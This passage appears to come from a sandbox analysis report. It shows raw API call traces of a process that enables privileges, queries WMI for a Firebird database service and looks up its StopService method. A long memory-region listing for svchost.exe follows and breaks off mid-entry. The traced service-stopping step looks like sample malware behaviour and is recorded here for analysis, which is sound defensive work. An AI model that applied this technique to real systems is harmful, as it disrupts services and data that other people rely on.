(lpString="FROM") returned 4 [0101.101] lstrlenW (lpString="from") returned 4 [0101.101] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0101.101] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8a20 | out: _String=0x0, _Context=0x8d1e8a20) returned="Win32_Service" [0101.101] lstrlenW (lpString="SET") returned 3 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0101.102] lstrlenW (lpString="CREATE") returned 6 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0101.102] lstrlenW (lpString="GET") returned 3 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0101.102] lstrlenW (lpString="LIST") returned 4 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0101.102] lstrlenW (lpString="ASSOC") returned 5 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0101.102] WbemLocator:IUnknown:AddRef (This=0xdb6aa8) returned 0x3 [0101.102] lstrlenW (lpString="") returned 0 [0101.102] lstrlenW (lpString="LHNIWSJ") returned 7 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0101.102] lstrlenW (lpString="LHNIWSJ") returned 7 [0101.102] lstrlenW (lpString="LHNIWSJ") returned 7 [0101.102] GetCurrentThreadId () returned 0x9cc [0101.102] GetCurrentProcess () returned 0xffffffff [0101.102] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xccfc18 | out: TokenHandle=0xccfc18*=0x270) returned 1 [0101.102] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xccfc14 | out: TokenInformation=0x0, ReturnLength=0xccfc14) returned 0 [0101.102] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x11a9b60, TokenInformationLength=0x118, ReturnLength=0xccfc14 | out: TokenInformation=0x11a9b60, ReturnLength=0xccfc14) returned 1 [0101.102] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x11a9b60*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0101.102] CloseHandle (hObject=0x270) returned 1 [0101.102] lstrlenW (lpString="GET") returned 3 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0101.102] lstrlenW (lpString="LIST") returned 4 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0101.102] lstrlenW (lpString="SET") returned 3 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] lstrlenW (lpString="CALL") returned 4 [0101.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0101.102] ??0CHString@@QAE@XZ () returned 0xccfbd8 [0101.103] GetCurrentThreadId () returned 0x9cc [0101.103] SysStringLen (param_1="\\\\") returned 0x2 [0101.103] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0101.103] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0101.103] SysStringLen (param_1="\\") returned 0x1 [0101.103] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0101.103] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0101.103] WbemLocator:IWbemLocator:ConnectServer (in: This=0xdb6aa8, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xde0728) returned 0x0 [0101.142] CoSetProxyBlanket (pProxy=0xde0728, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0101.142] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.142] ??0CHString@@QAE@XZ () returned 0xccfbd4 [0101.142] GetCurrentThreadId () returned 0x9cc [0101.142] lstrlenA (lpString="") returned 0 [0101.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x11a9ae0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0101.143] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.143] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.143] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x8d1e8c84 | out: _String="Select", _Context=0x8d1e8c84) returned="Select" [0101.143] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8c84 | out: _String=0x0, _Context=0x8d1e8c84) returned="*" [0101.143] lstrlenW (lpString="FROM") returned 4 [0101.143] lstrlenW (lpString="*") returned 1 [0101.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0101.143] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8c84 | out: _String=0x0, _Context=0x8d1e8c84) returned="from" [0101.143] lstrlenW (lpString="FROM") returned 4 [0101.143] lstrlenW (lpString="from") returned 4 [0101.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0101.143] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8c84 | out: _String=0x0, _Context=0x8d1e8c84) returned="Win32_Service" [0101.143] IWbemServices:GetObject (in: This=0xde0728, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xccfbac*=0x0, ppCallResult=0x0 | out: ppObject=0xccfbac*=0xe3a530, ppCallResult=0x0) returned 0x0 [0101.462] IWbemClassObject:GetMethod (in: This=0xe3a530, wszName="STOPSERVICE", lFlags=0, ppInSignature=0xccfbb8, ppOutSignature=0xccfba4 | out: ppInSignature=0xccfbb8*=0x0, ppOutSignature=0xccfba4*=0xe3a8b0) returned 0x0 [0101.462] IUnknown:Release (This=0xe3a8b0) returned 0x0 [0101.462] IUnknown:Release (This=0xe3a530) returned 0x0 [0101.462] ??0CHString@@QAE@XZ () returned 0xccfa84 [0101.462] GetCurrentThreadId () returned 0x9cc [0101.462] lstrlenA (lpString="") returned 0 [0101.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x11a9ae0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0101.462] lstrlenA (lpString="") returned 0 [0101.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x11a9ae0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0101.462] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.462] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.462] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x8d1e8c0c | out: _String="Select", _Context=0x8d1e8c0c) returned="Select" [0101.463] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8c0c | out: _String=0x0, _Context=0x8d1e8c0c) returned="*" [0101.463] lstrlenW (lpString="FROM") returned 4 [0101.463] lstrlenW (lpString="*") returned 1 [0101.463] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0101.463] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8c0c | out: _String=0x0, _Context=0x8d1e8c0c) returned="from" [0101.463] lstrlenW (lpString="FROM") returned 4 [0101.463] lstrlenW (lpString="from") returned 4 [0101.463] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0101.463] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8c0c | out: _String=0x0, _Context=0x8d1e8c0c) returned="Win32_Service" [0101.463] lstrlenA (lpString="SELECT * FROM ") returned 14 [0101.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x11a9fa8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0101.463] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0101.463] SysStringLen (param_1="Win32_Service") returned 0xd [0101.463] lstrlenA (lpString=" WHERE ") returned 7 [0101.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x11a9e60, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0101.463] SysStringLen (param_1=" WHERE ") returned 0x7 [0101.463] SysStringLen (param_1="caption LIKE '%Firebird%'") returned 0x19 [0101.463] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0101.463] SysStringLen (param_1=" WHERE caption LIKE '%Firebird%'") returned 0x20 [0101.464] IWbemServices:ExecQuery (in: This=0xde0728, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%Firebird%'", lFlags=48, pCtx=0x0, ppEnum=0xccfa8c | out: ppEnum=0xccfa8c*=0xe08138) returned 0x0 [0101.470] CoSetProxyBlanket (pProxy=0xe08138, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0101.480] IEnumWbemClassObject:Next (in: This=0xe08138, lTimeout=-1, uCount=0x1, apObjects=0xccfa90, puReturned=0xccfa7c | out: apObjects=0xccfa90*=0x0, puReturned=0xccfa7c*=0x0) returned 0x1 [0103.111] IUnknown:Release (This=0xe08138) returned 0x0 [0103.113] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.113] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.113] GetCurrentThreadId () returned 0x9cc [0103.113] ??0CHString@@QAE@PBG@Z () returned 0xccfc48 [0103.113] ??YCHString@@QAEABV0@PBG@Z () returned 0xccfc48 [0103.113] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x11aa008, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0103.113] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0103.113] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x11a9a40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0103.113] __iob_func () returned 0x77ac1208 [0103.114] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0103.114] __iob_func () returned 0x77ac1208 [0103.114] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0103.115] ??1CHString@@QAE@XZ () returned 0x1 [0103.115] IUnknown:Release (This=0xde0728) returned 0x0 [0103.115] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0103.115] _kbhit () returned 0x0 [0103.116] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0103.116] WbemLocator:IUnknown:Release (This=0xdb6aa8) returned 0x2 [0103.117] IUnknown:Release (This=0xde0cc8) returned 0x0 [0103.117] IUnknown:Release (This=0xde0908) returned 0x0 [0103.117] WbemLocator:IUnknown:Release (This=0xdb6aa8) returned 0x1 [0103.117] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0103.117] WbemLocator:IUnknown:Release (This=0xdb6aa8) returned 0x0 [0103.118] CoUninitialize () [0103.153] exit (_Code=0) [0103.153] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.153] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 47 os_tid = 0x604 Thread: id = 48 os_tid = 0x9ec Thread: id = 49 os_tid = 0xb58 Thread: id = 50 os_tid = 0x4d0 Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x54043000" os_pid = "0x378" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x594" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e0e3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1004 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1005 start_va = 0x51e5e10000 end_va = 0x51e5e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5e10000" filename = "" Region: id = 1006 start_va = 0x51e5e20000 end_va = 0x51e5e20fff entry_point = 0x51e5e20000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1007 start_va = 0x51e5e30000 end_va = 0x51e5e43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5e30000" filename = "" Region: id = 1008 start_va = 0x51e5e50000 end_va = 0x51e5ecffff entry_point = 0x0 region_type = private name = "private_0x00000051e5e50000" filename = "" Region: id = 1009 start_va = 0x51e5ed0000 end_va = 0x51e5ed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5ed0000" filename = "" Region: id = 1010 start_va = 0x51e5ee0000 end_va = 0x51e5ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5ee0000" filename = "" Region: id = 1011 start_va = 0x51e5ef0000 end_va = 0x51e5ef1fff entry_point = 0x0 region_type = private name = "private_0x00000051e5ef0000" filename = "" Region: id = 1012 start_va = 0x51e5f00000 end_va = 0x51e5fbdfff entry_point = 0x51e5f00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1013 start_va = 0x51e5fc0000 end_va = 0x51e5fc0fff entry_point = 0x0 region_type = private name = "private_0x00000051e5fc0000" filename = "" Region: id = 1014 start_va = 0x51e5fd0000 end_va = 0x51e5fd6fff entry_point = 0x0 region_type = private name = "private_0x00000051e5fd0000" filename = "" Region: id = 1015 start_va = 0x51e5fe0000 end_va = 0x51e5fe0fff entry_point = 0x0 region_type = private name = "private_0x00000051e5fe0000" filename = "" Region: id = 1016 start_va = 0x51e5ff0000 end_va = 0x51e5ff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5ff0000" filename = "" Region: id = 1017 start_va = 0x51e6000000 end_va = 0x51e60fffff entry_point = 0x0 region_type = private name = "private_0x00000051e6000000" filename = "" Region: id = 1018 start_va = 0x51e6100000 end_va = 0x51e617ffff entry_point = 0x0 region_type = private name = "private_0x00000051e6100000" filename = "" Region: id = 1019 start_va = 0x51e6180000 end_va = 0x51e6180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6180000" filename = "" Region: id = 1020 start_va = 0x51e6190000 end_va = 0x51e6190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6190000" filename = "" Region: id = 1021 start_va = 0x51e61a0000 end_va = 0x51e61a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e61a0000" filename = "" Region: id = 1022 start_va = 0x51e61b0000 end_va = 0x51e61b6fff entry_point = 0x0 region_type = private name = "private_0x00000051e61b0000" filename = "" Region: id = 1023 start_va = 0x51e61c0000 end_va = 0x51e61c3fff entry_point = 0x51e61c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1024 start_va = 0x51e61d0000 end_va = 0x51e61d3fff entry_point = 0x51e61d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1025 start_va = 0x51e61e0000 end_va = 0x51e61e6fff entry_point = 0x0 region_type = private name = "private_0x00000051e61e0000" filename = "" Region: id = 1026 start_va = 0x51e61f0000 end_va = 0x51e61fcfff entry_point = 0x51e61f0000 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 1027 start_va = 0x51e6200000 end_va = 0x51e62fffff entry_point = 0x0 region_type = private name = "private_0x00000051e6200000" filename = "" Region: id = 1028 start_va = 0x51e6300000 end_va = 0x51e6487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6300000" filename = "" Region: id = 1029 start_va = 0x51e6490000 end_va = 0x51e6610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6490000" filename = "" Region: id = 1030 start_va = 0x51e6620000 end_va = 0x51e66dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6620000" filename = "" Region: id = 1031 start_va = 0x51e66e0000 end_va = 0x51e675ffff entry_point = 0x0 region_type = private name = "private_0x00000051e66e0000" filename = "" Region: id = 1032 start_va = 0x51e6760000 end_va = 0x51e67dffff entry_point = 0x0 region_type = private name = "private_0x00000051e6760000" filename = "" Region: id = 1033 start_va = 0x51e67e0000 end_va = 0x51e68dffff entry_point = 0x0 region_type = private name = "private_0x00000051e67e0000" filename = "" Region: id = 1034 start_va = 0x51e68e0000 end_va = 0x51e69dffff entry_point = 0x0 region_type = private name = "private_0x00000051e68e0000" filename = "" Region: id = 1035 start_va = 0x51e69e0000 end_va = 0x51e6adffff entry_point = 0x0 region_type = private name = "private_0x00000051e69e0000" filename = "" Region: id = 1036 start_va = 0x51e6ae0000 end_va = 0x51e6b22fff entry_point = 0x51e6ae0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000b.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000b.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000b.db") Region: id = 1037 start_va = 0x51e6b30000 end_va = 0x51e6b40fff entry_point = 0x51e6b30000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1038 start_va = 0x51e6b50000 end_va = 0x51e6b56fff entry_point = 0x0 region_type = private name = "private_0x00000051e6b50000" filename = "" Region: id = 1039 start_va = 0x51e6b60000 end_va = 0x51e6bdffff entry_point = 0x0 region_type = private name = "private_0x00000051e6b60000" filename = "" Region: id = 1040 start_va = 0x51e6be0000 end_va = 0x51e6be1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6be0000" filename = "" Region: id = 1041 start_va = 0x51e6bf0000 end_va = 0x51e6bfcfff entry_point = 0x51e6bf0000 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1042 start_va = 0x51e6c00000 end_va = 0x51e6cfffff entry_point = 0x0 region_type = private name = "private_0x00000051e6c00000" filename = "" Region: id = 1043 start_va = 0x51e6d00000 end_va = 0x51e7036fff entry_point = 0x51e6d00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1044 start_va = 0x51e7040000 end_va = 0x51e713ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7040000" filename = "" Region: id = 1045 start_va = 0x51e7140000 end_va = 0x51e723ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7140000" filename = "" Region: id = 1046 start_va = 0x51e7240000 end_va = 0x51e733ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7240000" filename = "" Region: id = 1047 start_va = 0x51e7340000 end_va = 0x51e743ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7340000" filename = "" Region: id = 1048 start_va = 0x51e7440000 end_va = 0x51e74bffff entry_point = 0x0 region_type = private name = "private_0x00000051e7440000" filename = "" Region: id = 1049 start_va = 0x51e74c0000 end_va = 0x51e74c8fff entry_point = 0x51e74c0000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1050 start_va = 0x51e74d0000 end_va = 0x51e74d6fff entry_point = 0x0 region_type = private name = "private_0x00000051e74d0000" filename = "" Region: id = 1051 start_va = 0x51e74e0000 end_va = 0x51e74e1fff entry_point = 0x51e74e0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1052 start_va = 0x51e74f0000 end_va = 0x51e74f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e74f0000" filename = "" Region: id = 1053 start_va = 0x51e7500000 end_va = 0x51e75fffff entry_point = 0x0 region_type = private name = "private_0x00000051e7500000" filename = "" Region: id = 1054 start_va = 0x51e7600000 end_va = 0x51e76fffff entry_point = 0x0 region_type = private name = "private_0x00000051e7600000" filename = "" Region: id = 1055 start_va = 0x51e7700000 end_va = 0x51e777ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7700000" filename = "" Region: id = 1056 start_va = 0x51e7780000 end_va = 0x51e787ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7780000" filename = "" Region: id = 1057 start_va = 0x51e7880000 end_va = 0x51e797ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7880000" filename = "" Region: id = 1058 start_va = 0x51e7980000 end_va = 0x51e7a7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7980000" filename = "" Region: id = 1059 start_va = 0x51e7a80000 end_va = 0x51e7afffff entry_point = 0x0 region_type = private name = "private_0x00000051e7a80000" filename = "" Region: id = 1060 start_va = 0x51e7b00000 end_va = 0x51e7bfffff entry_point = 0x0 region_type = private name = "private_0x00000051e7b00000" filename = "" Region: id = 1061 start_va = 0x51e7c00000 end_va = 0x51e7c8afff entry_point = 0x51e7c00000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1062 start_va = 0x51e7c90000 end_va = 0x51e7d8ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7c90000" filename = "" Region: id = 1063 start_va = 0x51e7d90000 end_va = 0x51e7e8ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7d90000" filename = "" Region: id = 1064 start_va = 0x51e7e90000 end_va = 0x51e7f8ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7e90000" filename = "" Region: id = 1065 start_va = 0x51e7f90000 end_va = 0x51e800ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7f90000" filename = "" Region: id = 1066 start_va = 0x51e8010000 end_va = 0x51e8010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8010000" filename = "" Region: id = 1067 start_va = 0x51e8020000 end_va = 0x51e8022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8020000" filename = "" Region: id = 1068 start_va = 0x51e8030000 end_va = 0x51e8030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8030000" filename = "" Region: id = 1069 start_va = 0x51e8040000 end_va = 0x51e8040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8040000" filename = "" Region: id = 1070 start_va = 0x51e8050000 end_va = 0x51e80cffff entry_point = 0x0 region_type = private name = "private_0x00000051e8050000" filename = "" Region: id = 1071 start_va = 0x51e80d0000 end_va = 0x51e80e7fff entry_point = 0x0 region_type = private name = "private_0x00000051e80d0000" filename = "" Region: id = 1072 start_va = 0x51e80f0000 end_va = 0x51e80f4fff entry_point = 0x51e80f0000 region_type = mapped_file name = "winnlsres.dll" filename = 